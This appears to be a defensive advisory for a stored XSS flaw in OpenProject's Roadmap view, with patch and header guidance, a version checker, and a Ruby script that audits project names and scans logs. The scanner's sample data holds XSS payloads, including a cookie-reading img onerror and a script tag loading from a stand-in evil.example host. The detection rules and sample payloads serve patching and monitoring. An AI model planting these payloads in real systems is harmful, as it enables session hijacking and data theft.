CVE-2026-23625
📋 TL;DR
OpenProject versions 16.3.0 through 16.6.4 contain a stored cross-site scripting vulnerability in the Roadmap view: subproject names are rendered without HTML escaping, so a user who can create or rename a subproject can inject HTML/JavaScript that executes in the browser of every user who opens the Roadmap, exposing their sessions and data. The fixed releases also restore an X-Content-Type-Options response header that a configuration change had dropped; that header is hardening only (it stops browsers from MIME-sniffing non-script responses into scripts) and does not by itself block markup that the page renders inline.
💻 Affected Systems
- OpenProject
📦 What is this software?
OpenProject by OpenProject GmbH: open-source, web-based project management software (work packages, Gantt charts, Roadmap, wiki).
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, perform actions as authenticated users (create, edit or delete work packages and projects), redirect victims to attacker-controlled sites, or use the trusted OpenProject origin to stage further client-side attacks such as credential phishing.
Likely Case
Session hijacking, credential theft through injected forms, and unauthorized actions carried out in the context of authenticated users who open the Roadmap of a project containing a malicious subproject name.
If Mitigated
Serving X-Content-Type-Options: nosniff prevents browsers from MIME-sniffing non-script responses into executable scripts, which closes one delivery route. It does not stop a payload that the Roadmap renders as inline HTML, so treat the header as defence in depth and rely on the patch, or on restricting who can name subprojects and view the Roadmap, for actual mitigation.
🎯 Exploit Status
Exploitation requires the ability to create or rename a subproject (a project-level permission, not something an anonymous or read-only user holds) and a victim who opens the Roadmap. Because the payload is stored in the project name, it is persistent: it fires for every viewer, typically with no interaction beyond loading the page, until the name is corrected.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 16.6.5 or 17.0.0
Vendor Advisory: https://github.com/opf/openproject/security/advisories/GHSA-cvpq-cc56-gwxx
Restart Required: Yes
Instructions:
1. Back up the OpenProject installation and its database.
2. Upgrade to OpenProject 16.6.5 (16.x line) or 17.0.0 using the package manager or your manual/Docker installation method.
3. Restart the OpenProject service.
4. Confirm the instance reports 16.6.5 or later and that HTTP responses carry X-Content-Type-Options: nosniff.
🔧 Temporary Workarounds
Add X-Content-Type-Options Header via Proxy
Configure the web server or reverse proxy in front of OpenProject to add X-Content-Type-Options: nosniff to every response. This is defence in depth only: it stops browsers from sniffing a non-script response into a script, but it does not neutralise markup the Roadmap renders inline, so it does not close the XSS on its own.
# nginx, in the server or proxying location block ('always' also covers error responses; note that add_header in a location block replaces, rather than extends, the server-level headers):
add_header X-Content-Type-Options nosniff always;
# Apache, in the vhost with mod_headers enabled:
Header always set X-Content-Type-Options "nosniff"
🧯 If You Can't Patch
- Limit project membership, and therefore who can open the Roadmap, to trusted users, and restrict the permission to create or rename subprojects to a small set of administrators
- Audit every project name for tag-shaped content and rename any that carry HTML or script, since the stored payload stays live until the name is corrected
🔍 How to Verify
Check if Vulnerable:
Vulnerable if the OpenProject version is between 16.3.0 and 16.6.4 inclusive. On such a version the Roadmap view renders subproject names without HTML escaping: a test subproject whose name contains a harmless tag such as <b>test</b> shows up bold in the Roadmap instead of as literal text.
Check Version:
Read the version from the administration interface, or on a packaged install run: openproject run bundle exec rails runner 'puts OpenProject::VERSION.to_s' (in a Docker deployment, run the same bundle exec rails runner command inside the application container).
Verify Fix Applied:
The version reports 16.6.5 or later (or 17.0.0), and HTTP responses from the instance include X-Content-Type-Options: nosniff (check with curl -sI against the instance URL).
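The two checks above can be scripted. The following is an added example, not OpenProject's own code: it classifies a host from the version string the rails runner prints and from a raw header block such as curl -sI returns, using the affected range and fixed versions stated on this page. The sample header blocks are constructed.

```ruby
# Added example (not part of OpenProject or the advisory): classify a deployment
# against the version range and the header requirement given on this page.

# Versions listed as affected, and the first fixed release of the 16.x line.
# 17.0.0 is also fixed and satisfies ">= 16.6.5".
VULNERABLE = Gem::Requirement.new(">= 16.3.0", "<= 16.6.4")
FIXED      = Gem::Requirement.new(">= 16.6.5")

# `version` is what `openproject run bundle exec rails runner 'puts OpenProject::VERSION.to_s'` prints.
def vulnerable_version?(version)
  VULNERABLE.satisfied_by?(Gem::Version.new(version))
end

def fixed_version?(version)
  FIXED.satisfied_by?(Gem::Version.new(version))
end

# `raw_headers` is the header block as returned by `curl -sI https://openproject.example/`.
# Header names are case-insensitive and the value may carry surrounding whitespace,
# so compare both case-insensitively after stripping.
def nosniff_present?(raw_headers)
  raw_headers.each_line.any? do |line|
    name, _, value = line.partition(":")
    name.strip.casecmp?("x-content-type-options") && value.strip.casecmp?("nosniff")
  end
end

# One verdict per host, ordered by what a responder should do first:
# patch before worrying about the header.
def assess(version:, raw_headers:)
  return :patch_required       if vulnerable_version?(version)
  return :not_in_affected_range unless fixed_version?(version)
  nosniff_present?(raw_headers) ? :ok : :header_missing
end

# Constructed header blocks standing in for real curl -sI output.
SAMPLE_HEADERS_OK =
  "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nX-Content-Type-Options: nosniff\r\n\r\n"
SAMPLE_HEADERS_MISSING =
  "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"

if __FILE__ == $0
  puts assess(version: "16.6.4", raw_headers: SAMPLE_HEADERS_MISSING)   # patch_required
  puts assess(version: "16.6.5", raw_headers: SAMPLE_HEADERS_MISSING)   # header_missing
  puts assess(version: "17.0.0", raw_headers: SAMPLE_HEADERS_OK)        # ok
end
```

Feed it the real values by piping the rails runner output and curl -sI into the two functions; Gem::Version handles pre-release suffixes, so a build such as 16.6.5-rc1 is compared correctly rather than as a plain string.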
📡 Detection & Monitoring
Log Indicators:
- Unusual subproject name creation/modification containing HTML/script tags
- Session reuse from a new IP address or user agent shortly after a user views the Roadmap (possible hijacked session)
Network Indicators:
- Requests from users' browsers to unfamiliar external domains immediately after a Roadmap page load (payload fetch or cookie exfiltration)
- Roadmap responses in proxy or WAF logs whose body carries script or event-handler markup inside a subproject name
SIEM Query:
source="openproject" AND ((event="project_create" OR event="project_update") AND name=~"<[^>]*>|javascript:") OR (event="page_view" AND path=~"/roadmap" AND referer=null)
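The "audit and sanitize all subproject names" workaround above and the log indicator for tag-bearing project names share one check, so the added example below covers both. It is not OpenProject code: the first part audits a project export for markup-shaped names and shows the HTML-escaped form a correct template would emit; the second runs the same check over JSON audit-log lines as a SIEM rule would. The project export, the log format and its field names are constructed assumptions, and the Project.pluck command in the comment assumes model and column names.

```ruby
# Added example, not OpenProject's own code. (1) Audit a project export for names
# that would render as markup and show the escaped form. (2) Run the "project
# name contains a tag" indicator over JSON audit-log lines. Log format, field
# names and the Project columns are assumptions.
require "json"
require "erb"

# Anything tag-shaped, or a javascript: URL. Deliberately broad: an audit wants
# the benign false positives ("Phase 2 <Beta>") surfaced too, because they would
# also be rendered as markup by the unescaped template.
MARKUP_RE = %r{</?[a-z!][^>]*>|javascript:}i

def suspicious_name?(name)
  name.to_s.match?(MARKUP_RE)
end

# Constructed stand-in for what a packaged install could dump with
#   openproject run bundle exec rails runner 'puts Project.pluck(:id, :name, :parent_id).to_json'
# (assumed model and column names).
SAMPLE_PROJECTS = [
  { id: 1, name: "Platform", parent_id: nil },
  { id: 2, name: "Billing <Beta>", parent_id: 1 },
  { id: 3, name: "Reports<img src=x onerror=alert(document.cookie)>", parent_id: 1 },
  { id: 4, name: "Q3 Roadmap & Planning", parent_id: nil },
]

# Return the projects whose name is markup-shaped, together with the
# HTML-escaped text a correctly written Roadmap template would have emitted.
def audit_projects(projects)
  projects.filter_map do |p|
    next unless suspicious_name?(p[:name])
    { id: p[:id], parent_id: p[:parent_id], name: p[:name],
      escaped: ERB::Util.html_escape(p[:name]) }
  end
end

# Constructed one-JSON-object-per-line audit log; field names are assumptions.
# The non-JSON line stands in for the stray output every collector eventually sees.
SAMPLE_LOG = <<~'LOG'
  {"ts":"2026-02-03T10:15:01Z","event":"project_update","user":"mallory","project_id":3,"name":"Reports<img src=x onerror=alert(document.cookie)>"}
  {"ts":"2026-02-03T10:16:44Z","event":"project_create","user":"alice","project_id":5,"name":"Mobile App"}
  {"ts":"2026-02-03T10:17:02Z","event":"page_view","user":"bob","path":"/projects/platform/roadmap"}
  not json at all: a stray line from the collector
  {"ts":"2026-02-03T10:18:30Z","event":"project_create","user":"mallory","project_id":6,"name":"<script src=https://evil.example/x.js></script>"}
LOG

# Emit one alert per project create/update whose new name is markup-shaped;
# unparseable lines are skipped rather than aborting the scan.
def scan_log(log)
  log.each_line.filter_map do |line|
    event = begin
      JSON.parse(line)
    rescue JSON::ParserError
      next
    end
    next unless event["event"].to_s.start_with?("project_") && suspicious_name?(event["name"])
    { ts: event["ts"], user: event["user"], project_id: event["project_id"], name: event["name"] }
  end
end

if __FILE__ == $0
  audit_projects(SAMPLE_PROJECTS).each do |p|
    puts "project #{p[:id]}: #{p[:name].inspect} should render as #{p[:escaped]}"
  end
  scan_log(SAMPLE_LOG).each do |a|
    puts "ALERT #{a[:ts]} #{a[:user]} set project #{a[:project_id]} name to #{a[:name].inspect}"
  end
end
```

Rename anything the audit flags (a benign "<Beta>" can simply lose its angle brackets) and treat an alert from the log scan as an incident trigger: the user who set the name and every viewer of that project's Roadmap since the timestamp are the scope.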